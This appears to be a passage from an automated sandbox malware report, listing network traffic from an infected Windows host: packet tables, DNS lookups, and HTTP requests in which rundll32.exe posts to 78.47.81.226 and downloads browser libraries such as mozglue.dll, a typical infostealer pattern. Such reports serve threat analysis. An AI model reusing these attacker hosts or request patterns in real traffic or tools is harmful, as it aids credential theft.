                                                                                                                                          Apr 28, 2021 23:00:36.253153086 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.254745960 CEST8050074176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.254884958 CEST5007480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.255496025 CEST5007480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.351522923 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.351643085 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.352051973 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.352176905 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.352195024 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.352317095 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.352361917 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.352427959 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.352693081 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.352761030 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.352859020 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.352921963 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.353025913 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.353107929 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.353440046 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.353521109 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.353559971 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.353604078 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.353615046 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.353673935 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.355495930 CEST8050074176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.366836071 CEST8050074176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.366976023 CEST5007480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.447462082 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.447607994 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.447649002 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.447674990 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.447792053 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.447925091 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.447946072 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.447959900 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.448018074 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.448049068 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.448071957 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.448338985 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.448426008 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.448554993 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.448635101 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.448745966 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.448823929 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.449110031 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.449127913 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.449197054 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.449227095 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.449250937 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.449328899 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.449353933 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.449430943 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.470093966 CEST5007480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.471260071 CEST5007580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.545058966 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545097113 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545111895 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545130014 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545150042 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545167923 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545311928 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.545470953 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.545476913 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545655966 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545676947 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545691013 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545754910 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.545824051 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.545833111 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545860052 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.545958996 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.546122074 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546144009 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546225071 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.546662092 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546751022 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546787977 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.546821117 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.546833038 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546854973 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546873093 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546906948 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.546992064 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.546996117 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.547013998 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.547056913 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.547111988 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.566220999 CEST8050075176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.566374063 CEST5007580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.567079067 CEST5007580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.569123983 CEST8050074176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.569236994 CEST5007480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:36.641180992 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.641206026 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.641350031 CEST8050073176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:36.641410112 CEST5007380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.667155981 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667186975 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667203903 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667292118 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.667357922 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.667370081 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667387962 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667480946 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.667535067 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667551041 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667639971 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.667716026 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.667881966 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668118954 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668296099 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.668540001 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668735027 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668751001 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668834925 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.668966055 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.668982983 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.669104099 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.669315100 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.669332027 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.669461012 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.741239071 CEST8050088176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.741365910 CEST5008880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.742125988 CEST5008880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.742614985 CEST8050087176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.742732048 CEST5008780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.765580893 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.765599012 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.765697002 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.766144991 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.766324997 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.766343117 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.766362906 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.766412973 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.766463041 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.766469955 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.766887903 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767107964 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767136097 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767235041 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767699957 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767901897 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.767919064 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.768001080 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.768069983 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.768328905 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.768481970 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.839798927 CEST8050088176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.844007015 CEST8050088176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.844181061 CEST5008880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.863379955 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.863516092 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.863689899 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.863878012 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.864098072 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.864164114 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.864316940 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.865937948 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.866211891 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.958722115 CEST5008880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.959727049 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:39.965522051 CEST8050086176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:39.965698957 CEST5008680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.053277969 CEST8050090176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.054869890 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.055641890 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.055850983 CEST8050088176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.056401014 CEST5008880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.149682045 CEST8050090176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.153601885 CEST8050090176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.155932903 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.268007040 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.269512892 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.362344027 CEST8050090176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.362510920 CEST5009080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.363179922 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.363286018 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.363915920 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.459402084 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.461193085 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.461325884 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.564043999 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.565445900 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.657708883 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.657845974 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.658401012 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.658569098 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.659600973 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.752643108 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.758877039 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.763474941 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.878295898 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.880898952 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.971581936 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.971787930 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.983441114 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.984656096 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.986804008 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.089430094 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.092780113 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.092947006 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.205944061 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.208822966 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.302130938 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.302365065 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.303684950 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.308339119 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.308496952 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.398487091 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.402677059 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.402863979 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.517940998 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.520133018 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.611232042 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.611327887 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.618752003 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.618895054 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.619910002 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.718775034 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.722769976 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.722950935 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.835505962 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.838046074 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.934794903 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.935009956 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.935885906 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.936023951 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.937402010 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.035667896 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.039381981 CEST8050097176.111.174.114192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                          Apr 28, 2021 22:59:08.688761950 CEST53550468.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:35.007249117 CEST4961253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:35.159555912 CEST53496128.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:35.693211079 CEST4928553192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:35.895626068 CEST53492858.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:36.301644087 CEST5060153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:36.369466066 CEST53506018.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:36.482563019 CEST6087553192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:36.634836912 CEST53608758.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:37.070276022 CEST5644853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:37.128623009 CEST53564488.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:37.803442955 CEST5917253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:37.860671043 CEST53591728.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:38.550354004 CEST6242053192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:38.607708931 CEST53624208.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:39.124522924 CEST6057953192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:39.174577951 CEST53605798.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:39.994003057 CEST5018353192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:40.045634985 CEST53501838.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:40.987570047 CEST6153153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:41.046605110 CEST53615318.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:41.783890963 CEST4922853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:41.840884924 CEST53492288.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:50.339975119 CEST5979453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:50.400324106 CEST53597948.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.876178026 CEST5591653192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 23:00:20.928795099 CEST53559168.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.115866899 CEST5275253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 23:00:23.183940887 CEST53527528.8.8.8192.168.2.4

                                                                                                                                          DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Apr 28, 2021 22:58:41.454423904 CEST | 192.168.2.4 | 8.8.8.8 | 0x8bee | Standard query (0) | api.faceit.com | A (IP address) | IN (0x0001) |
| Apr 28, 2021 22:58:52.175843000 CEST | 192.168.2.4 | 8.8.8.8 | 0x7f0e | Standard query (0) | ukedocumentary.com | A (IP address) | IN (0x0001) |

                                                                                                                                          DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Apr 28, 2021 22:58:41.517523050 CEST | 8.8.8.8 | 192.168.2.4 | 0x8bee | No error (0) | api.faceit.com | | 104.17.63.50 | A (IP address) | IN (0x0001) |
| Apr 28, 2021 22:58:41.517523050 CEST | 8.8.8.8 | 192.168.2.4 | 0x8bee | No error (0) | api.faceit.com | | 104.17.62.50 | A (IP address) | IN (0x0001) |
| Apr 28, 2021 22:58:52.294008970 CEST | 8.8.8.8 | 192.168.2.4 | 0x7f0e | No error (0) | ukedocumentary.com | | 89.184.92.210 | A (IP address) | IN (0x0001) |

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • 78.47.81.226
                                                                                                                                          • ukedocumentary.com
                                                                                                                                          • 176.111.174.114

                                                                                                                                          HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49735 | 78.47.81.226 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:58:42.092727900 CEST | 1275 | OUT | POST /873 HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                          Content-Length: 25
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                                          Data Ascii: --1BEF0A57BE110FD467A--
Apr 28, 2021 22:58:42.251470089 CEST | 1279 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:42.704437017 CEST | 1663 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:42.863784075 CEST | 1807 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
